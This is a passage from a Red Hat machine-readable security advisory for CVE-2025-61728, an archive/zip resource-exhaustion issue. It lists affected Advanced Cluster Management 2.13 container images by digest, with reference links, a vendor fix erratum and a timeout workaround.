"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/kube-state-metrics-rhel9@sha256:b10f9f52f0665ae2a8bb4bf2649aa6e3d1185a0dffb9ebeb11a8900174df5ef2_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/kube-state-metrics-rhel9@sha256:c2bfb459d7442878d591cc31436830b983fe30dcfa6f7d383cc91cb32e42fa7c_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/memcached-exporter-rhel9@sha256:55320965b17fef48e776d39c548f0bf81a1e9239ee4b90a032f4b111e8748d2f_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/memcached-exporter-rhel9@sha256:a36bcef862d0e3cc972c9eb2c0d80311030659c13de6acab7e353905ff5eccff_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/memcached-exporter-rhel9@sha256:c7bfe530a7efe66f5c3e2e08b114b3b9e44072e3609725663d6a5f3945bda512_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/memcached-exporter-rhel9@sha256:e73d91e157c13ea96615fc060f5312997203f6b6350d335917b2feacb96c9ca5_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/metrics-collector-rhel9@sha256:2003587575e18b2e6b9bf3617c65e0f83ebc8cf30daf6dd241500cd1555820e0_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/metrics-collector-rhel9@sha256:6098254a7e2fdd67ef1773abda74d3dde3d31e59254f4a1cd5e77dc34d224602_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/metrics-collector-rhel9@sha256:7fa35da009ab6e41177f0589f6d3fbf1bbe3fff4b52add3bfbc516a046e35640_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/metrics-collector-rhel9@sha256:9418993b725bf813959ed5adbd21690ee2cbeeac3d56c7ab6805c3eb29b5d46f_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multicluster-observability-rhel9-operator@sha256:24df1e0d7850220df3aa658c6056f81a68fe451ffd99e4d0dfee07cebe9c3782_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multicluster-observability-rhel9-operator@sha256:25fb42a78847235c61e35f66a6e02dfee5fc0b6832aa4ce06c3c6f395b95b36d_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multicluster-observability-rhel9-operator@sha256:9e19fc6fd3285c1833cd97eeef10cb179fe9705dea9b3f912052207b3a2daea7_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multicluster-observability-rhel9-operator@sha256:edc8b960038279c012c5aa99917361ad0888b0195c3ee9adb368b798a5bea2fb_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multicluster-operators-application-rhel9@sha256:231caddbaa1b499fae4efbf34c839941e595f242d12e22378e210b47de6262a8_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multicluster-operators-application-rhel9@sha256:450199903a5d88d10b107768839780fbd0ee15535c6a998a0cac5bec942dd414_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multicluster-operators-application-rhel9@sha256:7fe0726987e478ed3da6d9b1eb4b611461e285ada827de6a186b95bc75a36c73_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multicluster-operators-application-rhel9@sha256:8d8eb1e5a21a37f041f60fbd624c7861f2e726997c6ad1d5279f59a7c849f2af_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multicluster-operators-channel-rhel9@sha256:1628ce0aab57c09dad7f5b2a24bf664de71b76a38cd05ccf281bb8cc8fc5859e_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multicluster-operators-channel-rhel9@sha256:7e3f01077df87eb91ece7c2bd6cfa2c15a0044c2f9c40efee9ce1bf14a6807b6_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multicluster-operators-channel-rhel9@sha256:9bc74577f0edc3045a1a027c0f8652cc904fc3b9397dc9af10576f9dfcab2080_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multicluster-operators-channel-rhel9@sha256:e9cab985b52c8f23b62cad3ea9c692e321a5347bd06fc56b19dfdb1801030567_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multiclusterhub-rhel9@sha256:61b112b8ebb2ca4e41f5ee4b0c09ad0b53c3a6b60297fb8c1f158c28a8f10b3d_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multiclusterhub-rhel9@sha256:6bd79f2c4c516adc626c73dec28892cbeab65e349dff8f1fcb11d7242b614805_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multiclusterhub-rhel9@sha256:c920a77dcf02347d116035d5cfef1a365e02022713788a14045a9be2a1bd1c5c_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multiclusterhub-rhel9@sha256:eb7788d29142ad36cba099b1dcebe3eb1c28366f87f611ca4d0b375bc7f4b19d_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/node-exporter-rhel9@sha256:5b7668d6f3b7fb994c4bbbb86bdb92d4258b88ab92337394b66058255c048ad8_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/node-exporter-rhel9@sha256:64930ec82f003294eaf26f6ac59c493e1bfc8c3d7addeb4c5b8f0cfcf458c406_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/node-exporter-rhel9@sha256:753415fcdcc9f6b8685a54d83f4d35d1104d690215125a36d6df2b9873ac6cd3_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/node-exporter-rhel9@sha256:c58049e17034c0df635df55fce49cab392af3194f57c03bbb842d7c2acb247e5_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/observatorium-rhel9-operator@sha256:0907a51a72f39393da4bdee241333b08b5b5591f1e9a5de7d67ad586d11da59b_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/observatorium-rhel9-operator@sha256:498cdf1888c2ef9f031baafc288323ebd0fe5d9b009cedb1443605cf4153c0c0_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/observatorium-rhel9-operator@sha256:5ac47e52a78f31b8982de5b9144ec96baab80c78ba8d06d3efabda329e017d36_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/observatorium-rhel9-operator@sha256:9819517abcb75b516ea0e158ad9cbb0a4ef847f7858531b751c04de5a53527be_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/observatorium-rhel9@sha256:2ae0730de393d5aeff08a9317fc70459421dd8d6fc7a65f2a9e4a28ae5b64d9d_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/observatorium-rhel9@sha256:62c7b78b2726fd940db4bd435b13f6d07097395b069130b32ea0912c95333555_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/observatorium-rhel9@sha256:8c986374ff8afd980f450877facc2927fdd6f655f3d6b7def6771485d00afeb1_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/observatorium-rhel9@sha256:8eeb6a344b773bdc4f50da36c956dbaa50d6474f5c045e92250274d0ed723b39_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/prometheus-alertmanager-rhel9@sha256:1d7f37fa0146f48291fd1dd12752d0a19c8e87c30e1698492b36274c79051a9e_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/prometheus-alertmanager-rhel9@sha256:5c3cc196a8638f6fae7c246ff6746f2f453bbfab8e018683ee297609713664ac_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/prometheus-alertmanager-rhel9@sha256:e539ec4ab10e81c08d68991e3c77efd43497f4a5561ee1315ff8d467736d245a_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/prometheus-alertmanager-rhel9@sha256:fbc20e8545d4562d05df98d5cfbc91a7a2d802a9d4ff8c0ea733126687c42c26_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/prometheus-rhel9@sha256:111bbc8fda153d16c384a622dd659c53b8cdc47e495a9fada411a5042954ab6e_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/prometheus-rhel9@sha256:433f0b3d09889613d5214ba1c084bdc99bdcbce227fefd10b0d8491442698ea9_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/prometheus-rhel9@sha256:51096baed7d6ed403d88ac2dd935a30313f618b7552fee2b07367db5069601d1_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/prometheus-rhel9@sha256:b3eefeffd90660b8e463f2b06dc5ee2b46e235efae7c13ed893828a6c9598459_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/rbac-query-proxy-rhel9@sha256:58a8acff99aaaacdb7c292b615c2ed9a0418d82f75273c1809a6db05811713fa_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/rbac-query-proxy-rhel9@sha256:661a4a1fb71f36ac1663232ca6e098d1c101dc16168eec7eee471ae11f98f66c_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/rbac-query-proxy-rhel9@sha256:bc06192ce81eac533cb7c080e8aef6587991534cb9b1787537c49753c0985e3d_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/rbac-query-proxy-rhel9@sha256:e8207895ec9e7006746043cf04fbf1e2897aa30e74b9184665be2ac50f9fe650_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/search-collector-rhel9@sha256:3074a430dd8bbb0399ce649186cb6140d8525e5b7c1e05b79a4ab74a32d989b8_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/search-collector-rhel9@sha256:34de933b36ee01444cdf4d4a45e47466ef8dad6ab6345134524595c191928ffe_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/search-collector-rhel9@sha256:8a65d646180c7889d0ba1e3a11fd6796d0020301e4e721575f87585afd8f9dfe_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/search-collector-rhel9@sha256:cf1b6cae5a10aec88554e71be094737b0a17efb07cd1175ca55f1799626f58f2_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/submariner-addon-rhel9@sha256:036ee3882d4d6536c309d9aacea3dc611785deba3bd998092adcb1ba21664897_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/submariner-addon-rhel9@sha256:82914e82513e2f8522589886a5df6681d12c6442ff1b8ef05a21d31c09fa0f0d_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/submariner-addon-rhel9@sha256:893831b7270214137b2fdf1e55f0175b4ef6de9b8763eaaf0e0a935c8ab1744d_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/submariner-addon-rhel9@sha256:d6e329af2d9c1648006e3fa0b0232562a2bed6e7a33c56e025517f7d9068b5cc_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/thanos-receive-controller-rhel9@sha256:131918c9878d040c3ec190a9c724a65dbf3bb27f55a0fcac250d92067dc69288_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/thanos-receive-controller-rhel9@sha256:327af8db145b9bd6ada1c9f27faa493ce090af412c51dedd7b247e65dcad51fc_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/thanos-receive-controller-rhel9@sha256:721ebc57b91b4f9bcfb25d7b29ee8a2ca60fcb231096af2812f9201778e3ca51_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/thanos-receive-controller-rhel9@sha256:ebff3dd368f33d1aec215b947b88f4aa7e821db1577d448b8c6eb4e6ead7fe07_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/thanos-rhel9@sha256:6a88ce891e0fc9619e983a5b63fef86f735b8df5eb56909075bd3bbb098dddf8_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/thanos-rhel9@sha256:7485348cced991c7a4399e21e077ed62b3a118b7093bd4f42f9863d9e0da5c26_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/thanos-rhel9@sha256:b8d70910405eec4d886b27fc348a982c0b6f906f7f0e65aceecffd9f09fd6602_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/thanos-rhel9@sha256:e63891386bfb191cd0e74884cad1f86c462d57e51b9aeec7d9c5073ba4d723f9_s390x"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2025-61728"
},
{
"category": "external",
"summary": "RHBZ#2434431",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2434431"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2025-61728",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-61728"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2025-61728",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-61728"
},
{
"category": "external",
"summary": "https://go.dev/cl/736713",
"url": "https://go.dev/cl/736713"
},
{
"category": "external",
"summary": "https://go.dev/issue/77102",
"url": "https://go.dev/issue/77102"
},
{
"category": "external",
"summary": "https://groups.google.com/g/golang-announce/c/Vd2tYVM8eUc",
"url": "https://groups.google.com/g/golang-announce/c/Vd2tYVM8eUc"
},
{
"category": "external",
"summary": "https://pkg.go.dev/vuln/GO-2026-4342",
"url": "https://pkg.go.dev/vuln/GO-2026-4342"
}
],
"release_date": "2026-01-28T19:30:31.354000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-04-15T02:15:09+00:00",
"details": "Before you apply this update, make sure all previously released errata\nthat are relevant to your system are applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multicloud-integrations-rhel9@sha256:14fb16412dea57a775e95954c3a07a77de846f851935629bf9bfdbcc46a70f4f_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multicloud-integrations-rhel9@sha256:40f8ad6430cc767b56992722d5890f98882c7372950320d28e808c18714b7179_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multicloud-integrations-rhel9@sha256:c227f25ae401af3eba9352765f906c8b873370485a7c748b1602e53c0776f90f_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multicloud-integrations-rhel9@sha256:ffb3e3cd6764e802b5e9f87034548f96dcacfeedd8fe2b3b21b06c41734e8320_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multicluster-operators-subscription-rhel9@sha256:01778cb2a2b9771a03ed8c7feb5b94a23225f60f4e49263e71dccd017cfd1164_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multicluster-operators-subscription-rhel9@sha256:0e4525617200428a5510108b0a0845fde43fd4e64804186af045df9680ca05b7_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multicluster-operators-subscription-rhel9@sha256:903c920eb068fcabdd16fb95f78902107892efa8e8a1ddda124d7f6bc1afdcd8_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multicluster-operators-subscription-rhel9@sha256:ac486bf6a84c573a9774aadd4ea995a551c0abcbfb42dbbb71dc03e6c900a211_s390x"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:8229"
},
{
"category": "workaround",
"details": "To mitigate this vulnerability, implement a timeout in your archive/zip processing logic to abort the operation if it exceeds a few seconds, preventing the application from consuming an excessive amount of resources.",
"product_ids": [
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-cli-rhel9@sha256:01382838a23f75a6c03b30c68e9e42d72c22d773a4891260c639f7c8b60ffd87_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-cli-rhel9@sha256:1c74aaa66b6be9f5eb1f55851f1cc3f2a3878882c3fc972cd24232e9022f74e2_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-cli-rhel9@sha256:696d1f7c4b5415e49760f7a66368aa0260284b12b108d5feb560838a9bce8a6f_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-cli-rhel9@sha256:7328602aa637f1b555ecd56c05d6ade8dbee48fae78a0118b1e39774b8383704_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-cluster-permission-rhel9@sha256:3ae25beb920ec77de14769895f60da6a3d83fc41192ca5da5f976076853e5a50_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-cluster-permission-rhel9@sha256:c9bf774dfa3f5a66339a86f22961c54b2b41199efd173b016a2c7c57407dae40_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-cluster-permission-rhel9@sha256:d1cac9d50ec20e770ae41aa8f90474c269d80e84a9990e2c3e613a892b0c044c_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-cluster-permission-rhel9@sha256:ddb5d8c476bcc9b6d4a7c0d116a2f5150acbfa80cc890d77d5d90bd496a7860e_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-governance-policy-addon-controller-rhel9@sha256:0ffd5a902860aad15377e20b1e6481e6cf746fa3e33509df0f88f93f9a9f8034_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-governance-policy-addon-controller-rhel9@sha256:abcf4d6f42dec254d8b4197282fb449daf13d4724ed23ddc2aafde0328338f74_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-governance-policy-addon-controller-rhel9@sha256:b6ea1f6389ad207c45321ab5a36c03949986e74ef9dbf5e3d2fdb2ceb5c4a602_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-governance-policy-addon-controller-rhel9@sha256:e126327d69e48f2844f5beafc34514d31e9f3eed0ac393399edf80cf31a2eabe_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-governance-policy-framework-addon-rhel9@sha256:0f7b1ee143f154e6e33c452f95fd0a0afb7fd020e758a991d18abde990e49e0c_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-governance-policy-framework-addon-rhel9@sha256:6363dfb96f394aef2b07b3a36c85d3af60dc3594ab615327176ba520704a4356_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-governance-policy-framework-addon-rhel9@sha256:849cf23afa514a1d86073fed2424e487893655510721a0b9c0d4be4cf59bf60b_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-governance-policy-framework-addon-rhel9@sha256:a8843c7b628767803f2aa4b2658dc0a932157b20f98507004929036108c7dfb2_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-grafana-rhel9@sha256:428a52072881ee7714539f7721313ca78e06fd0e39ceb8de12f8a0d33fb4cd55_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-grafana-rhel9@sha256:5145c15e9fa57bdd1d072e7c88f27d5f8f51caf395e542ad8fb54a098f8c24fb_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-grafana-rhel9@sha256:cb76c81b895dfb5bc384407baf76c5c74d9b509342e665f3d5ff234a40f16236_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-grafana-rhel9@sha256:d7dae765d402cd9522c23689fc0e72f47659fc2f1184b8b16c51b6c5c6a2b890_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-multicluster-observability-addon-rhel9@sha256:5af546f1d36b01b320fd950d227cdd8f62a765facc8614ba277fe218c5649e61_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-multicluster-observability-addon-rhel9@sha256:921a7995304e4648ac2fd0c08bec7d95adc09caca4d6d124cbba4ff8043edf19_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-multicluster-observability-addon-rhel9@sha256:a0928fa238b82f2c00778064d0f1e52ff507ffef7a0a3756b1f2f2022d375e4b_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-multicluster-observability-addon-rhel9@sha256:fdc436ea03cb2d06976da109061aa0793672c306deef23708ee9e0b39395b6f7_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-must-gather-rhel9@sha256:2adb87f4433d9516e2111150bccafbbb8dec179bdf3fe3acd38d7b27411cb666_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-must-gather-rhel9@sha256:4afad9568dc7dd2d90c396d08d596258e813bb67e2901135b539f279af382e09_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-must-gather-rhel9@sha256:508d4d8ee312e8d720eeca38f3823438548c5ab1260d8fa822ca49765f7aeef5_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-must-gather-rhel9@sha256:a31ab1ae8b4c3ead24f9ce3c913a4754972bd548d6e5b10ca22e61a6d9d3539a_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-prometheus-config-reloader-rhel9@sha256:35ba01a14b8f7a0ed0e79fd9efe48280d26afa10a316daaec512f39cc6839adb_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-prometheus-config-reloader-rhel9@sha256:384d23bb3f4e6fd2425e1b60ded99f027dcbaad14e631ffbe84845821a1c3215_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-prometheus-config-reloader-rhel9@sha256:a8ca367caa43ec006811fe370fdf440328dd22fc39be11e48f36396b781f36bb_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-prometheus-config-reloader-rhel9@sha256:db8b5776a9dcb4b87a4de948c4c11d0164e66df188f97be6a6fd7e9953f5501e_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-prometheus-rhel9@sha256:1e0a1eadbb77f4f14d48357af6a5b12406ae912210b53c14018b642e4f62d1fe_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-prometheus-rhel9@sha256:4816e73043b8f73143cff29cff41292e62bb36467ba28a260ee46fd43ece915c_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-prometheus-rhel9@sha256:71d6b8f5471d7a23918763eeea53d991d98adf170e228348b77d2412ce752751_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-prometheus-rhel9@sha256:87f2e1ee942b226835c97b7abe43a62802146755141a850137b9ab03dd6fccf6_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-search-indexer-rhel9@sha256:2b6a43ae23126321b9c94b37da646db4943331200434edc6a54be156150065f2_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-search-indexer-rhel9@sha256:d24283b13f739561fae6bdfb730922a1d3804422dc41249e33e6084158afcec4_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-search-indexer-rhel9@sha256:e9df0b0323447cacad8942ecce2e690a9f498d5cb41b54e3bb55be6614ddaece_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-search-indexer-rhel9@sha256:ed46808dba295cf093aa5caabc9782ee9f044c7e770adaf3657f57f0f6e1aaf9_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-search-v2-api-rhel9@sha256:5a98450b5f85a75172ca51e2dcf096465635dc2e4c5fedfd74e1fdd665f3fa65_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-search-v2-api-rhel9@sha256:7388c812f31ff8f2b1c2653adf07906e2f50c356a1ad9130d3923d835e79e0e7_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-search-v2-api-rhel9@sha256:bd521270153c8b5b8193e08fe4a7c959e5b9d22ed7e74a87827580974b3836f1_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-search-v2-api-rhel9@sha256:fc3b40899a332c041667de0965d58f50325eaddc8547145a2dff9aede38d69bb_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-search-v2-rhel9@sha256:0668bbb16723e23ae64e4337a1347a6e0d2854d1c173cbc59c17a829e430bc00_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-search-v2-rhel9@sha256:177c2cb59b6b43f4ea650bbb603b144ca37aece398635a458d518dd55cae7fb6_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-search-v2-rhel9@sha256:78b0d35ce4fce4d279ad089ccf284f5e1425f947d95c3c72c5755bb00464305c_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-search-v2-rhel9@sha256:f3b200f2a00217299f66cab9f89de8673003d194292b41157f663799b5c61c3e_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-siteconfig-rhel9@sha256:02486920d371f14bcbafc720545c4a6f24523a46483e60c00c7f25f52b3ea476_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-siteconfig-rhel9@sha256:1cb3639dfe65b6568b53de130e7b36b8f5ebceedd76c110ddb64fbe860bfde14_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-siteconfig-rhel9@sha256:4124ae57ffa1b26bfc0e68b62c8325c5e17d332dca85b618a4ccba60cf52d1b5_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-siteconfig-rhel9@sha256:8243cc9646e4ae89aabf299e476a94124c8244dd54e0fb1c848a6bbbd0c94f62_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-volsync-addon-controller-rhel9@sha256:2a64ce4183df6c5743ffa7df7b4192fce192e08eea5e03b76c9b621e5d351d2a_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-volsync-addon-controller-rhel9@sha256:4e6dd9d24ab247b2a7b84f7842b2a710eee3aa2fce58fc1516ef5bb55e0693f0_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-volsync-addon-controller-rhel9@sha256:d814b3c076f9ef671d74e156dce5d3f634130904f166a6a04a59df41e8ec07ed_ppc64le",
